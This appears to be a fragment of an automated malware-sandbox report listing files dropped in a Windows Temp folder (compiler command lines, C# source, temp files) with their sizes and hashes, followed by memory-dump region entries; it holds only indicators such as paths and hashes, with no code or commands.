                                                                                                                                                                                                                                                                                                  673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  36865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  0495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba

                                                                                                                                                                                                                                                                                                • \??\c:\Users\Admin\AppData\Local\Temp\oulxpk2c\oulxpk2c.cmdline

                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  369B

                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  8d107f41e8c2283bf27e5067aed87ea4

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  efa089991149585e728fb2af6b9531ed5e4ecb7a

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  44d0138d87f1c03d8f8dffeeeaa6b202c32cd9bcbcdd6c212edbfaf5d8048b46

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  3d5abe5bc720fad1cca538a2c950c58486cbee01b2dbfd8f0df424a18b5ce1f8f17f12a9fe7d236fba8e315b3f646f0e619ed12882c77cb041ea3ab072f0a711

                                                                                                                                                                                                                                                                                                • \??\c:\Users\Admin\AppData\Local\Temp\y35tc3vz\CSCECD6AEB0B7B48AC8F99B996E6A061CB.TMP

                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  652B

                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  20849617af9c31a1215954b564558fe7

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  0e10057e512f8d858dac3ff3772b0c3ab4d4007b

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  0ebcdfaf07e1be90fdea9442a3295a8245c729f1b222681037a34a51f63fa3c4

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  5b4af55b66dc614b533d4c3acdcf6d87661c752f0b3fb75e2ec1ac342db784dbd7a8e9993a30d1844a101de3ac1318dbfde9f87f7c0c5b574d7953ec09ff438b

                                                                                                                                                                                                                                                                                                • \??\c:\Users\Admin\AppData\Local\Temp\y35tc3vz\y35tc3vz.0.cs

                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  426B

                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  b462a7b0998b386a2047c941506f7c1b

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  61e8aa007164305a51fa2f1cebaf3f8e60a6a59f

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020

                                                                                                                                                                                                                                                                                                • \??\c:\Users\Admin\AppData\Local\Temp\y35tc3vz\y35tc3vz.cmdline

                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  369B

                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  47d1a4d9735dc657a69ba43e975924a9

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  c5634803f7e0c72fdf57881aab3c818790280b3e

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  705842a1cefe1e7413efbdb6cc089a540399c8e707a40b16f20afb09d31b66d6

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  f4b08738c1a6170827ea007beda0c109c94733f0170078f5e7b1b52bfdecfeb0323a7dca5868935eeac769446fc88c3bac90db285fd063e6954171cca08391a9

                                                                                                                                                                                                                                                                                                • memory/892-549-0x0000025CC6380000-0x0000025CC6381000-memory.dmp

                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/892-551-0x0000025CC6380000-0x0000025CC6381000-memory.dmp

                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/892-552-0x0000025CC6380000-0x0000025CC6381000-memory.dmp

                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/892-550-0x0000025CC6380000-0x0000025CC6381000-memory.dmp

                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/892-553-0x0000025CC6380000-0x0000025CC6381000-memory.dmp

                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/892-543-0x0000025CC6380000-0x0000025CC6381000-memory.dmp

                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/892-542-0x0000025CC6380000-0x0000025CC6381000-memory.dmp

                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/892-544-0x0000025CC6380000-0x0000025CC6381000-memory.dmp

                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/892-548-0x0000025CC6380000-0x0000025CC6381000-memory.dmp

                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/892-554-0x0000025CC6380000-0x0000025CC6381000-memory.dmp

                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/4236-278-0x0000020CE64E0000-0x0000020CE64E8000-memory.dmp

                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  32KB

                                                                                                                                                                                                                                                                                                • memory/4268-188-0x0000016647E00000-0x0000016647E08000-memory.dmp

                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  32KB

                                                                                                                                                                                                                                                                                                • memory/4268-164-0x0000016647C90000-0x0000016647CB2000-memory.dmp

                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  136KB

                                                                                                                                                                                                                                                                                                • memory/4268-174-0x0000016647E30000-0x0000016647E74000-memory.dmp

                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  272KB

                                                                                                                                                                                                                                                                                                • memory/4268-175-0x00000166482C0000-0x0000016648336000-memory.dmp

                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  472KB

                                                                                                                                                                                                                                                                                                • memory/5012-205-0x00000201ED7F0000-0x00000201ED840000-memory.dmp

                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  320KB